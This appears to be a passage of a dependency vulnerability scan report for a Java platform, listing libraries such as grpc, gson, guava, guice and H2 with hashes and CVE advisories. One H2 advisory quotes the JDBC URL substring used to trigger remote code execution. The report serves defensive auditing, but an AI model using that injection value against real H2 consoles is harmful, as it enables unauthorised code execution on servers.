ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] asfgit closed pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] eolivelli commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60%40%3Ccommits.servicecomb.apache.org%3E CONFIRM - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj CONFIRM - https://security.netapp.com/advisory/ntap-20210604-0003/ DEBIAN - DSA-4885 MISC - https://github.com/Netflix/zuul/pull/980 MISC - https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4 MISC - https://www.oracle.com/security-alerts/cpuapr2022.html OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21295 OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj OSSIndex - https://lists.apache.org/thread/ztx01jknlcoq0v6pp2cwl609dyzk9r5h Vulnerable Software & Versions: (show all )
CVE-2021-21409 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295 which did miss to fix this one case. This was fixed as part of 4.1.61.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2021-21290 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on unix-like systems creates a random file, but, by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData" is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify your own "java.io.tmpdir" when you start the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-24823 suppress
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
grpc-netty-shaded-1.23.0.jar (shaded: org.jctools:jctools-core:2.1.1)Description:
Java Concurrency Tools Core Library License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/org.jctools/jctools-core/pom.xml
MD5: d532029de01ef1c790266dea91b1ecdc
SHA1: f9571c65e428d21c795a34de2b217419dfc0e2f7
SHA256: db8f1cd5b23d38e3dcf7020d739e1c2f9559489051291d8a07095e62b8d7f750
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor pom artifactid jctools-core Low Vendor pom groupid org.jctools Highest Vendor pom name Java Concurrency Tools Core Library High Vendor pom url JCTools Highest Product pom artifactid jctools-core Highest Product pom groupid org.jctools Highest Product pom name Java Concurrency Tools Core Library High Product pom url JCTools High Version pom version 2.1.1 Highest
grpc-netty-shaded-1.23.0.jar: io_grpc_netty_shaded_netty_tcnative_windows_x86_64.dllFile Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/native/io_grpc_netty_shaded_netty_tcnative_windows_x86_64.dllMD5: 3acf5856f6d7220d0df297d7561f6185SHA1: a5b0d662ffbef4edf8d3a85a1d55b6ddeb5ce722SHA256: 40a5afc34fc237c1509c11faa3e39269c1ad73563a55fab076266468f945d514Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name io_grpc_netty_shaded_netty_tcnative_windows_x86_64 High Product file name io_grpc_netty_shaded_netty_tcnative_windows_x86_64 High
grpc-protobuf-1.23.0.jarDescription:
gRPC: Protobuf License:
Apache 2.0: https://opensource.org/licenses/Apache-2.0 File Path: /var/simplicite/.m2/repository/io/grpc/grpc-protobuf/1.23.0/grpc-protobuf-1.23.0.jar
MD5: 1728bcd7cf27ebaec2b18ee47fce3168
SHA1: 01428515d3aca8964dfdc4d4ba912d0fda0f41f2
SHA256: 3d009822afa7b898c15a53e9d5d037a7dde9011eb3d523e59717391b5f5ae417
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name grpc-protobuf High Vendor jar package name grpc Highest Vendor jar package name io Highest Vendor jar package name protobuf Highest Vendor Manifest source-compatibility 1.7 Low Vendor Manifest target-compatibility 1.7 Low Vendor pom artifactid grpc-protobuf Highest Vendor pom artifactid grpc-protobuf Low Vendor pom developer email grpc-io@googlegroups.com Low Vendor pom developer id grpc.io Medium Vendor pom developer name gRPC Contributors Medium Vendor pom developer org gRPC Authors Medium Vendor pom developer org URL https://www.google.com Medium Vendor pom groupid io.grpc Highest Vendor pom name io.grpc:grpc-protobuf High Vendor pom url grpc/grpc-java Highest Product file name grpc-protobuf High Product jar package name grpc Highest Product jar package name io Highest Product jar package name protobuf Highest Product Manifest Implementation-Title grpc-protobuf High Product Manifest source-compatibility 1.7 Low Product Manifest target-compatibility 1.7 Low Product pom artifactid grpc-protobuf Highest Product pom developer email grpc-io@googlegroups.com Low Product pom developer id grpc.io Low Product pom developer name gRPC Contributors Low Product pom developer org gRPC Authors Low Product pom developer org URL https://www.google.com Low Product pom groupid io.grpc Highest Product pom name io.grpc:grpc-protobuf High Product pom url grpc/grpc-java High Version file version 1.23.0 High Version Manifest Implementation-Version 1.23.0 High Version pom version 1.23.0 Highest
Related Dependencies grpc-protobuf-lite-1.23.0.jarFile Path: /var/simplicite/.m2/repository/io/grpc/grpc-protobuf-lite/1.23.0/grpc-protobuf-lite-1.23.0.jar MD5: 10c36a9052a14ac18c3151090f3781b3 SHA1: c030daf2f8c4185ee003e206c38e28987fe2684d SHA256: 97d3a160b0c1a753307181b518e072baec2018d2e7a13e64071ab2be76c3b962 pkg:maven/io.grpc/grpc-protobuf-lite@1.23.0 CVE-2023-33953 suppress
gRPC contains a vulnerability that allows hpack table accounting errors could lead to unwanted disconnects between clients and servers in exceptional cases/ Three vectors were found that allow the following DOS attacks:
- Unbounded memory buffering in the HPACK parser
- Unbounded CPU consumption in the HPACK parser
The unbounded CPU consumption is down to a copy that occurred per-input-block in the parser, and because that could be unbounded due to the memory copy bug we end up with an O(n^2) parsing loop, with n selected by the client.
The unbounded memory buffering bugs:
- The header size limit check was behind the string reading code, so we needed to first buffer up to a 4 gigabyte string before rejecting it as longer than 8 or 16kb.
- HPACK varints have an encoding quirk whereby an infinite number of 0’s can be added at the start of an integer. gRPC’s hpack parser needed to read all of them before concluding a parse.
- gRPC’s metadata overflow check was performed per frame, so that the following sequence of frames could cause infinite buffering: HEADERS: containing a: 1 CONTINUATION: containing a: 2 CONTINUATION: containing a: 3 etc… CWE-834 Excessive Iteration, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-44487 suppress
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-4785 suppress
Lack of error handling in the TCP server in Google's gRPC starting version 1.23 on posix-compatible platforms (ex. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++ Python, and Ruby are affected, but gRPC Java, and Go are NOT affected. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-32732 suppress
gRPC contains a vulnerability whereby a client can cause a termination of connection between a HTTP2 proxy and a gRPC server: a base64 encoding error for `-bin` suffixed headers will result in a disconnection by the gRPC server, but is typically allowed by HTTP2 proxies. We recommend upgrading beyond the commit in https://github.com/grpc/grpc/pull/32309 https://www.google.com/url
NVD-CWE-Other
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L References:
Vulnerable Software & Versions:
gson-2.8.5.jarDescription:
Gson JSON library File Path: /var/simplicite/.m2/repository/com/google/code/gson/gson/2.8.5/gson-2.8.5.jarMD5: 089104cb90d8b4e1aa00b1f5faef0742SHA1: f645ed69d595b24d4cf8b3fbb64cc505bede8829SHA256: 233a0149fc365c9f6edbd683cfe266b19bdc773be98eabdaf6b3c924b48e7d81Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name gson High Vendor jar package name google Highest Vendor jar package name gson Highest Vendor Manifest bundle-contactaddress https://github.com/google/gson Low Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5, JavaSE-1.6, JavaSE-1.7, JavaSE-1.8 Low Vendor Manifest bundle-symbolicname com.google.gson Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid gson Highest Vendor pom artifactid gson Low Vendor pom groupid com.google.code.gson Highest Vendor pom name Gson High Vendor pom parent-artifactid gson-parent Low Product file name gson High Product jar package name google Highest Product jar package name gson Highest Product Manifest bundle-contactaddress https://github.com/google/gson Low Product Manifest Bundle-Name Gson Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5, JavaSE-1.6, JavaSE-1.7, JavaSE-1.8 Low Product Manifest bundle-symbolicname com.google.gson Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid gson Highest Product pom groupid com.google.code.gson Highest Product pom name Gson High Product pom parent-artifactid gson-parent Medium Version file version 2.8.5 High Version Manifest Bundle-Version 2.8.5 High Version pom version 2.8.5 Highest
CVE-2022-25647 suppress
The package com.google.code.gson:gson before 2.8.9 are vulnerable to Deserialization of Untrusted Data via the writeReplace() method in internal classes, which may lead to DoS attacks. CWE-502 Deserialization of Untrusted Data
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
guava-28.1-jre.jarDescription:
Guava is a suite of core and expanded libraries that include
utility classes, google's collections, io classes, and much
much more.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/guava/guava/28.1-jre/guava-28.1-jre.jar
MD5: 4faae794936faf441fcb7afb2c7db507
SHA1: b0e91dcb6a44ffb6221b5027e12a5cb34b841145
SHA256: 30beb8b8527bd07c6e747e77f1a92122c2f29d57ce347461a4a55eb26e382da4
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name guava High Vendor jar package name common Highest Vendor jar package name google Highest Vendor Manifest automatic-module-name com.google.common Medium Vendor Manifest bundle-docurl https://github.com/google/guava/ Low Vendor Manifest bundle-symbolicname com.google.guava Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid guava Highest Vendor pom artifactid guava Low Vendor pom groupid com.google.guava Highest Vendor pom name Guava: Google Core Libraries for Java High Vendor pom parent-artifactid guava-parent Low Product file name guava High Product jar package name common Highest Product jar package name google Highest Product Manifest automatic-module-name com.google.common Medium Product Manifest bundle-docurl https://github.com/google/guava/ Low Product Manifest Bundle-Name Guava: Google Core Libraries for Java Medium Product Manifest bundle-symbolicname com.google.guava Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid guava Highest Product pom groupid com.google.guava Highest Product pom name Guava: Google Core Libraries for Java High Product pom parent-artifactid guava-parent Medium Version pom version 28.1-jre Highest
CVE-2023-2976 suppress
Use of Java's default temporary directory for file creation in `FileBackedOutputStream` in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice Cream Sandwich allows other users and apps on the machine with access to the default Java temporary directory to be able to access the files created by the class.
Even though the security vulnerability is fixed in version 32.0.0, we recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows.
CWE-552 Files or Directories Accessible to External Parties
CVSSv3:
Base Score: HIGH (7.1) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N References:
Vulnerable Software & Versions:
CVE-2020-8908 suppress
A temp directory creation vulnerability exists in all versions of Guava, allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava API com.google.common.io.Files.createTempDir(). By default, on unix-like systems, the created directory is world-readable (readable by an attacker with access to the system). The method in question has been marked @Deprecated in versions 30.0 and later and should not be used. For Android developers, we recommend choosing a temporary directory API provided by Android, such as context.getCacheDir(). For other Java developers, we recommend migrating to the Java 7 API java.nio.file.Files.createTempDirectory() which explicitly configures permissions of 700, or configuring the Java runtime's java.io.tmpdir system property to point to a location whose permissions are appropriately configured.
CWE-732 Incorrect Permission Assignment for Critical Resource
CVSSv2:
Base Score: LOW (2.1) Vector: /AV:L/AC:L/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: LOW (3.3) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N References:
Vulnerable Software & Versions: (show all )
guice-3.0.jarDescription:
Guice is a lightweight dependency injection framework for Java 5 and above License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/inject/guice/3.0/guice-3.0.jar
MD5: ca1c7ba366884cfcd2cfb48d2395c400
SHA1: 9d84f15fe35e2c716a02979fb62f50a29f38aefa
SHA256: 1a59d0421ffd355cc0b70b42df1c2e9af744c8a2d0c92da379f5fca2f07f1d22
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name guice High Vendor jar package name google Highest Vendor jar package name guice Highest Vendor jar package name inject Highest Vendor Manifest bundle-copyright Copyright (C) 2006 Google Inc. Low Vendor Manifest bundle-docurl http://code.google.com/p/google-guice/ Low Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5,JavaSE-1.6 Low Vendor Manifest bundle-symbolicname com.google.inject Medium Vendor pom artifactid guice Highest Vendor pom artifactid guice Low Vendor pom groupid com.google.inject Highest Vendor pom name Google Guice - Core Library High Vendor pom parent-artifactid guice-parent Low Product file name guice High Product jar package name dependency Highest Product jar package name google Highest Product jar package name guice Highest Product jar package name inject Highest Product Manifest bundle-copyright Copyright (C) 2006 Google Inc. Low Product Manifest bundle-docurl http://code.google.com/p/google-guice/ Low Product Manifest Bundle-Name guice Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5,JavaSE-1.6 Low Product Manifest bundle-symbolicname com.google.inject Medium Product pom artifactid guice Highest Product pom groupid com.google.inject Highest Product pom name Google Guice - Core Library High Product pom parent-artifactid guice-parent Medium Version file version 3.0 High Version pom version 3.0 Highest
guice-assistedinject-3.0.jarDescription:
Guice is a lightweight dependency injection framework for Java 5 and above License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/inject/extensions/guice-assistedinject/3.0/guice-assistedinject-3.0.jar
MD5: 64341453ad4102f01761c62a22af0977
SHA1: 544449ddb19f088dcde44f055d30a08835a954a7
SHA256: 29a0e823babf10e28c6d3c71b2f9d56a3be2c9696d016fb16258e3fb1d184cf1
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name guice-assistedinject High Vendor jar package name assistedinject Highest Vendor jar package name google Highest Vendor jar package name inject Highest Vendor Manifest bundle-copyright Copyright (C) 2006 Google Inc. Low Vendor Manifest bundle-docurl http://code.google.com/p/google-guice/ Low Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5,JavaSE-1.6 Low Vendor Manifest bundle-symbolicname com.google.inject.assistedinject Medium Vendor pom artifactid guice-assistedinject Highest Vendor pom artifactid guice-assistedinject Low Vendor pom groupid com.google.inject.extensions Highest Vendor pom name Google Guice - Extensions - AssistedInject High Vendor pom parent-artifactid extensions-parent Low Product file name guice-assistedinject High Product jar package name assistedinject Highest Product jar package name google Highest Product jar package name inject Highest Product Manifest bundle-copyright Copyright (C) 2006 Google Inc. Low Product Manifest bundle-docurl http://code.google.com/p/google-guice/ Low Product Manifest Bundle-Name guice-assistedinject Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5,JavaSE-1.6 Low Product Manifest bundle-symbolicname com.google.inject.assistedinject Medium Product pom artifactid guice-assistedinject Highest Product pom groupid com.google.inject.extensions Highest Product pom name Google Guice - Extensions - AssistedInject High Product pom parent-artifactid extensions-parent Medium Version file version 3.0 High Version pom version 3.0 Highest
guice-multibindings-3.0.jarDescription:
Guice is a lightweight dependency injection framework for Java 5 and above License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/inject/extensions/guice-multibindings/3.0/guice-multibindings-3.0.jar
MD5: 4be1e91408e173eb10ed53a1a565a793
SHA1: 5e670615a927571234df68a8b1fe1a16272be555
SHA256: 29dd9f7774314827319cca4f00b693f0685f9dc3248c50c1ec54acc4819d4306
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name guice-multibindings High Vendor jar package name google Highest Vendor jar package name inject Highest Vendor jar package name multibindings Highest Vendor Manifest bundle-copyright Copyright (C) 2006 Google Inc. Low Vendor Manifest bundle-docurl http://code.google.com/p/google-guice/ Low Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5,JavaSE-1.6 Low Vendor Manifest bundle-symbolicname com.google.inject.multibindings Medium Vendor pom artifactid guice-multibindings Highest Vendor pom artifactid guice-multibindings Low Vendor pom groupid com.google.inject.extensions Highest Vendor pom name Google Guice - Extensions - MultiBindings High Vendor pom parent-artifactid extensions-parent Low Product file name guice-multibindings High Product jar package name google Highest Product jar package name inject Highest Product jar package name multibindings Highest Product Manifest bundle-copyright Copyright (C) 2006 Google Inc. Low Product Manifest bundle-docurl http://code.google.com/p/google-guice/ Low Product Manifest Bundle-Name guice-multibindings Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5,JavaSE-1.6 Low Product Manifest bundle-symbolicname com.google.inject.multibindings Medium Product pom artifactid guice-multibindings Highest Product pom groupid com.google.inject.extensions Highest Product pom name Google Guice - Extensions - MultiBindings High Product pom parent-artifactid extensions-parent Medium Version file version 3.0 High Version pom version 3.0 Highest
h2-1.4.199.jarDescription:
H2 Database Engine License:
MPL 2.0 or EPL 1.0: http://h2database.com/html/license.html File Path: /var/simplicite/.m2/repository/com/h2database/h2/1.4.199/h2-1.4.199.jar
MD5: f805f57d838de4b42ce01c7f85e46e1c
SHA1: 7bf08152984ed8859740ae3f97fae6c72771ae45
SHA256: 3125a16743bc6b4cfbb61abba783203f1fb68230aa0fdc97898f796f99a5d42e
Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence Vendor file name h2 High Vendor jar package name database Highest Vendor jar package name engine Highest Vendor jar package name h2 Highest Vendor Manifest automatic-module-name com.h2database Medium Vendor Manifest bundle-category jdbc Low Vendor Manifest bundle-symbolicname com.h2database Medium Vendor Manifest implementation-url http://www.h2database.com Low Vendor Manifest multi-release true Low Vendor Manifest provide-capability osgi.service;objectClass:List=org.osgi.service.jdbc.DataSourceFactory Low Vendor pom artifactid h2 Highest Vendor pom artifactid h2 Low Vendor pom developer email thomas.tom.mueller at gmail dot com Low Vendor pom developer id thomas.tom.mueller Medium Vendor pom developer name Thomas Mueller Medium Vendor pom groupid com.h2database Highest Vendor pom name H2 Database Engine High Vendor pom url http://www.h2database.com Highest Product file name h2 High Product jar package name database Highest Product jar package name engine Highest Product jar package name h2 Highest Product jar package name jdbc Highest Product jar package name org Highest Product jar package name service Highest Product Manifest automatic-module-name com.h2database Medium Product Manifest bundle-category jdbc Low Product Manifest Bundle-Name H2 Database Engine Medium Product Manifest bundle-symbolicname com.h2database Medium Product Manifest Implementation-Title H2 Database Engine High Product Manifest implementation-url http://www.h2database.com Low Product Manifest multi-release true Low Product Manifest provide-capability osgi.service;objectClass:List=org.osgi.service.jdbc.DataSourceFactory Low Product pom artifactid h2 Highest Product pom developer email thomas.tom.mueller at gmail dot com Low Product pom developer id thomas.tom.mueller Low Product pom developer name Thomas Mueller Low Product pom groupid com.h2database Highest Product pom name H2 Database Engine High Product pom url http://www.h2database.com Medium Version file version 1.4.199 High Version Manifest Bundle-Version 1.4.199 High Version Manifest Implementation-Version 1.4.199 High Version pom version 1.4.199 Highest
CVE-2021-42392 suppress
The org.h2.util.JdbcUtils.getConnection method of the H2 database takes as parameters the class name of the driver and URL of the database. An attacker may pass a JNDI driver name and a URL leading to a LDAP or RMI servers, causing remote code execution. This can be exploited through various attack vectors, most notably through the H2 Console which leads to unauthenticated remote code execution. CWE-502 Deserialization of Untrusted Data
CVSSv2:
Base Score: HIGH (10.0) Vector: /AV:N/AC:L/Au:N/C:C/I:C/A:C CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-23221 suppress
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392. CWE-88 Argument Injection or Modification
CVSSv2:
Base Score: HIGH (10.0) Vector: /AV:N/AC:L/Au:N/C:C/I:C/A:C CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-23463 suppress
The package com.h2database:h2 from 1.4.198 and before 2.0.202 are vulnerable to XML External Entity (XXE) Injection via the org.h2.jdbc.JdbcSQLXML class object, when it receives parsed string data from org.h2.jdbc.JdbcResultSet.getSQLXML() method. If it executes the getSource() method when the parameter is DOMSource.class it will trigger the vulnerability. CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:P CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-45868 suppress
The web-based admin console in H2 Database Engine through 2.1.214 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password in cleartext for the web admin console. Consequently, a local user (or an attacker that has obtained local access through some means) would be able to discover the password by listing processes and their arguments. NOTE: the vendor states "This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that." CWE-312 Cleartext Storage of Sensitive Information
CVSSv3:
Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions:
CVE-2018-14335 (OSSINDEX) suppress
h2database - Improper Link Resolution Before File Access
The software attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource. CWE-59 Improper Link Resolution Before File Access ('Link Following')
CVSSv2:
Base Score: MEDIUM (6.0) Vector: /AV:L/AC:L/Au:/C:H/I:N/A:N References:
Vulnerable Software & Versions (OSSINDEX):
